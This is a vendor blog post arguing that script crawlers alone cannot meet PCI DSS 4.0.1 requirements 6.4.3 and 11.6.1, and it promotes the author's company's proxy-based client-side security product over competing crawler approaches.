Why crawlers can't help with PCI compliance (alone)

Our compare page shows a great overview of the different approaches to achieve client-side security and meet the PCI DSS requirements (6.4.3 and 11.6.1).

Our solution (the hybrid proxy) outshines other approaches in various categories. Let’s compare it to the crawler which many competitors in this space use. The benefits, and many shortcomings that come with this solution.

In this article we’ll focus on PCI DSS 4.0.1 section 6.4.3 and 11.6.1. Visit our compare page to get the full benefits and downsides in a full security context.

“A method is implemented to confirm that each script is authorized”

6.4.3 All payment page scripts that are loaded and executed in the consumer’s browser are managed as follows:
- A method is implemented to confirm that each script is authorized.
- A method is implemented to assure the integrity of each script.
- An inventory of all scripts is maintained with written business or technical justification as to why each is necessary.

Requirement PCI 6.4.3 requires a mechanism to prevent unauthorized scripts from loading.

To remove any confusion the PCI specification also states:

Unauthorized code cannot be executed in the payment page as it is rendered in the consumer’s browser.

For a lot of GRCs, it is a challenge to allocate engineering efforts to compliance requirements. Understanding how client-side security PCI requirements translate into practical implementation is often where teams get stuck. Some solutions may lead you to believe that you can meet the requirements without implementing any code or making any adjustments. That is, however, not correct.

This requirement can be achieved in a number of ways. A merchant can implement a Content Security Policy. CSP however is known to be hard to manage and maintain, but it is a valid solution to meet this requirement.

A merchant can opt to use a client-side agent that blocks some JS behaviours. However, that is not a silver bullet. There have been various examples of client-side attacks that essentially stopped the security agent from functioning and entirely or partially disabled its functionality including blocking capability. Therefore always test the solution you procure with a self written client-side script. Unfortunately, most mid level JavaScript engineers will not find this a major challenge.

Or, you can use a proxy service like cside to stop a malicious script from serving in the first place.

This specific line of the PCI DSS requirements is easily overlooked but routes back to the nature of the requirement: implement payment card security standards to stop credit cards from being stolen at entry.

Crawlers don’t ‘see’ the actual payload and will not capture a serious attack

Crawlers work by visiting your site and indexing what scripts load. Important detail, they act like a user but are very clearly not a real human user. There are a number of simple indicators, coming from a cloud provider's IP address being one. This is a fundamental design flaw, because JavaScript delivery is dynamic by design. It is built to serve different versions of scripts based on time, user-agent, location, IP ranges…

Bad actors of course leverage that dynamics to avoid detection. A crawler is unlikely to spot the actual attack first hand. Therefore the threat intelligence must come from other sources. This is where most solutions buy threat feed intel from providers. These providers however tend to be late to the show. When the Polyfill attack happened it took over 30 hours for any threat vendor to flag it, even though it had wide scale press coverage. The domain was only flagged when Namecheap already took the domain down. Threat feed providers are also not specifically on the lookout for client-side attacks, sometimes they catch them but equally bad actors know to avoid their researchers. Most of their client-side attack intel originates from social media.

We’ve established that a crawler can’t guarantee the payload it fetches is the one the user received, but let's imagine for a second that it is. Most malicious scripts are loaded as sub requests based on user triggers: user clicks, scrolls, logs in, or adding something to a cart.

If a malicious script would get injected because of a user interaction, the crawler will not see the malicious script unless it makes that user interaction. This is fairly impossible to do as every page can have endless interaction abilities. Example: only make the fetch to the malicious script if a series of buttons is pressed 5 times, scrolled a full window down, the browser does not have dev tools open… “Synthetic crawling” claims to address this, but it really can’t for obvious technical reasons.

If you apply a static security analysis approach to a dynamic problem, you do not address the security concern.

So are all crawlers useless?

No. The fundamental concept of a crawler is flawed but if a vendor does not expect to see the malicious payload first hand through the crawler but is able to flag the parent script through other active detection methods outside of the crawler, it can still address security concerns to a high enough level (for some). For example: the cside crawler uses the malicious script intel received through the proxied websites of other cside customers. As a result, malicious payloads are detected on other sites and the parent objects that injected those malicious scripts are flagged, if the crawler received the clean payload but knows that script is compromised through other sites, that will lead to an alert.

“Wait, but I see all this interesting data in their dashboard?”

This is definitely a value add. Crawlers can give you an understanding on some of the behaviours of some of the scripts on your site populating the dashboard, providing interesting insights. But any bad script will know how not to show up in those dashboards. Generally, people have a bias for shiny objects. A shiny dashboard with lots of interesting information on it, leads people to think that the same information will be available on a bad day. That is however not the case.

Why consider a crawler at all?

Security is all about layering. Adding more solutions to monitor the same issues is usually a good thing.

They’re relatively lightweight to deploy (usually), and give you a basic map of which scripts are present on your site at a given point in time. For a compliance team doing periodic checks or audits that are not susceptible to PCI DSS, that’s helpful.

They also provide visibility into static changes. Say if a new script URL suddenly appears or an existing one disappears. In that aspect, it is one step up from CSP which does not provide any payload visibility. Read about the limitations of CSPs here. A crawler can help you keep inventory of scripts (part of 6.4.3) and view security headers when it crawls (PCI 11.6.1) but it can not prevent unauthorised scripts from loading. You would at least still need to add CSP or an agent. So only buy a crawler if it also gives you a CSP endpoint or an agent.

A crawler alone can not provide you PCI DSS compliance.

Why crawlers can't help with PCI compliance (alone)

Thursday, July 3rd, 2025

Simon Wijckmans

“A method is implemented to confirm that each script is authorized”

Crawlers don’t ‘see’ the actual payload and will not capture a serious attack

So are all crawlers useless?

“Wait, but I see all this interesting data in their dashboard?”

Why consider a crawler at all?

More About Simon Wijckmans